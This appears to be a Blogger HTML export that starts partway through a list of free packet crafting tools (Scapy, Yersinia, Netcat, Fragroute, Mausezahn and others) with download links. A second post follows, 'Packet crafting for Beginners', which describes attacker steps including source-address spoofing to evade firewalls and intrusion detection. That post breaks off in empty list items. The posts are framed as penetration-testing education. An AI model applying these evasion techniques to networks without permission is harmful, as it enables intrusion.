<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Ethernet/802.3/LLC SNAP</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">VLAN (with QinQ)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunnelling (6over4, 4over6, 4over4, 6over6)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">TCP, UDP, ICMPv4, ICMPv6, IGMP, MLD</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Any text based protocol (HTTP, SIP, RTSP, NNTP etc.)</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Support to more protocol is also in work.</li>
</ul>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
By using Ostinato, you can modify any field of any protocol easily. This packet crafting tool is also called complementary to Wireshark.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Ostinato: <a href="http://ostinato.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://ostinato.org/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">3. Scapy</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Scapy is another nice interactive packet crafting tool. This tool was written in Python. It can decode or forge packets for wide range of protocols. This makes Scapy a worth to try tool. You can perform various tasks including scanning, tracerouting, probing, unit tests, attacks or network discovery.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Scapy: <a href="http://www.secdev.org/projects/scapy/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.secdev.org/projects/scapy/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">4. Libcrafter</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Libcrafter is very similar to Scapy. This tool is written in C++ to make it easier the creation and decoding of network packets. It can create and decode packets for most of the general protocols, capture packets and match request or replies. This library was designed to me multithreaded allowing you to perform various tasks simultaneously.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Libcrafer: <a href="https://code.google.com/p/libcrafter/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/libcrafter/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">5. Yersinia</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Yersinia is a powerful network penetration-testing tool capable of performing attacks on various network protocols. If you are looking for packet crafting tools, I would like to recommend this nice tool too.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download yersinia: <a href="http://www.yersinia.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.yersinia.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">6. packETH</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
packETH is another packet crafting tool. It is a Linux GUI tool for ethernet. It lets you create and send sequence of packets quickly. Like other tools in this list, it supports various protocols to create and send packets. You can also set number of packets and delay between packets. You can also configure various things in this tool.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download packETH: <a href="http://packeth.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://packeth.sourceforge.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">7. Colasoft Packet Builder</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Colasoft Packet Builder is also a freeware tool for creating and editing network packets. If you are a network admin, you can use this tool to test your network against attackers and intruders. It comes for all available versions of Windows operating system.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Colasoft Packet Builder:<a href="http://www.colasoft.com/download/products/download_packet_builder.php" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.colasoft.com/download/products/download_packet_builder.php</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">8. Bit-Twist</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Bit-Twist is a less popular but effective tool for regenerating the captured packets in live traffic. It uses tcpdump trace file (.pcap file) for generating packets in network. It comes with trace file editor that lets you change the any specific field in the captured packet. Network admin can use this tool for testing firewall, IDS, and IPS, and troubleshooting various network problems. There are various other things for which you can try this tool.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Bit-Twist: <a href="http://bittwist.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://bittwist.sourceforge.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">9. Libtins</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Libtins is also a nice tool for crafting, sending, sniffing and interpreting network packets easily. This tool was written on C++. By using the source code, C++ developers can extend the functionality of this tool make it more powerful. It performs its task very effectively. Now, it is up to you to use this tool.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Libtins: <a href="http://libtins.github.io/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://libtins.github.io/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">10. Netcat</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Netcat is also a popular tool that can read and write data in TCP or UDP network. This tool is reliable and easy to use. You can also develop other tools that can use this functionality of this tool. Best thing about the tool is that it can create almost any kind of network connection with port binding.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool was originally known as Hobbit and was released in 1995.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Netcat: <a href="http://nc110.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://nc110.sourceforge.net/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">11. WireEdit</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WireEdit is a full featured WYSIWYG network packets editor. That means, you can edit all layers of packets in a simple interface. This tool is free to use, but you will have to contact company to obtain the usage right. If you ask about the supported protocols, there is a long list. It supports Ethernet, IPv4, IPv6, UDP, TCP, SCTP, ARP, RARP, DHCP, DHCPv6, ICMP, ICMPv6, IGMP, DNS, LLDP, RSVP, FTP, NETBIOS, GRE, IMAP, POP3, RTCP, RTP, SSH, TELNET, NTP, LDAP, XMPP, VLAN, VXLAN, CIFS/SMB v1 (original), BGP, OSPF, SMB3, iSCSI, SCSI, HTTP/1.1, OpenFlow 1.0-1.3, SIP, SDP, MSRP, MGCP, MEGACO (H.248), H.245, H.323, CISCO Skinny, Q.931/H.225, SCCP, SCMG, SS7 ISUP, TCAP, GSM MAP R4, GSM SM-TP, M3UA, M2UA, M2PA, CAPWAP, IEEE 802.11, more to come.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It is a multi-platform tool. It comes for Windows XP or higher, Ubuntu Desktop and Mac OSX.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download WireEdit: <a href="https://wireedit.com/downloads.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://wireedit.com/downloads.html</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">12. epb – Ethernet Packet Bombardier</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Epb, or Ethernet Packet Bombardier, is also a similar kind of tool but with simple working. It lets you send customized Ethernet packages. This tool does not offer any GUI, but it is easy to use.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can read more about this tool here: <a href="http://maz-programmersdiary.blogspot.fi/2012/05/epb-ethernet-package-bombardier.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://maz-programmersdiary.blogspot.fi/2012/05/epb-ethernet-package-bombardier.html</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">13. Fragroute</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Fragroute is a packet crafting tool which can intercept, modify, and rewrite network traffic. You can use this tool to perform most of the network intrusion attacks to check the security of your network. This tool is open source and offers command line interface to work with. It is available for Linux, BSD and Mac OS.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Fragroute: <a href="http://www.monkey.org/~dugsong/fragroute/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.monkey.org/~dugsong/fragroute/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">14. Mausezahn</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Mausezahn is a fast traffic generator tool that lets you send every possible kind of network packet. This tool is used for penetration testing of firewalls and IDS but you can decide to how to use this tool effectively in your network to find security bugs. You can also use this tool to test if your network is secure against DOS attack. Notable thing about this tool is that it give you full control over NIC card. It supports ARP, BPDU, or PVST, CDP, LLDP, IP, IGMP, UDP, TCP (stateless), ICMP (partly), DNS, RTP optionally RX-mode for jitter measurements and Syslog protocols.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Mausezahn: <a href="http://www.perihel.at/sec/mz/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.perihel.at/sec/mz/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">15. EIGRP-tools</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This is EIGRP packet generator and sniffer combined. It was developed to test the security of EIGRP routing protocol. To use this tool, you need to know Layer 3 and EIGRP protocol. This tool is also an open source tool with command line interface. It is available for Linux, Mac OS and BSD platforms.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download EIGRP-tools: <a href="http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.hackingciscoexposed.com/tools/eigrp-tools.tar.gz</a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are a few of the best free tools for packet crafting. I will recommend you to try all tools to check how these tools work. As I already mentioned, you must learn about networks, network packet layers, packet structures, headers and other necessary things before using these tools. If you know everything about these, you will be able to perform better attack and create better defenses against these attacks.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is one of the best ways to perform network penetration testing. You can try creating layer of security and then try again to break your own security. In this way, you will be able to prevent hackers to exploiting vulnerabilities in the security mechanism you created. Hackers always try to intrude into the internal network of companies. In recent months, we have seen so many attacks against big companies. In most of the cases, internal network hacked to access confidential information. Therefore, network security is one of the most important tasks in any business. So, learn packet crafting and learn these tools. The more you learn, the better security person you will become. All these tools are created for special purposes. You can try these tools to modify packets to test the firewall rules and break the security.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note: We do not encourage use of these tools to test the security of a network without getting prior permission. Most businesses use proper security and tracking. If you caught attacking a network, you may be booked under cyber-crime laws in most countries. The purpose of this article make you aware of tools for learning purpose. If you use this for any illegal purpose, author will not hold any responsibility.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you have anything to ask or suggest, you can comment below. I hope you will find this article useful and informative.</div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-76808022383048961752016-01-07T13:35:00.000+05:302016-01-07T13:35:45.636+05:30Packet crafting for Beginners<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is the art of creating a packet according to various requirements to carry out attacks and to exploit vulnerabilities in a network. It’s mainly used to penetrate into a network’s structure. There are various vulnerability assessment tools used to craft such packets. As a coin has two sides, these tools could be used by hackers to find the vulnerabilities of a targeted system. Crafting is technically advanced and a complex type of vulnerability exploitation, and it’s difficult to detect and diagnose.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Steps Involved in Packet Crafting</span></div>
<div class="ig_shortcode_container" data-messages="30520" id="icegram_shortcode_0" style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; vertical-align: baseline;">
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The idea behind crafting is to try to simulate an attack and to identify the properties of a network. They are commonly used to invade firewalls and intrusion detection software. The following are the steps involved in packet crafting:</div>
<ul style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Assembly:</span> This is the first step involved in packet crafting. In this process, the attacker selects the network to be cracked, collects the possible vulnerability information and creates the packet. The packet should be designed in such a way that it should be invisible while passing through a network. For example, for a packet to be invisible, the source address could be spoofed before sending it to a network.</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Editing:</span> In this step, the packets are tested before sending. The packets are edited in such a way that maximum information could be retrieved by injecting a minimum number of packets.</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Playing: </span>When the packets are ready, packet playing sends them to the targeted machine and collects the resultant packets for further analysis. If the required information is not obtained, the attacker again moves to the editing phase to modify the packet to obtain the required result.</div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
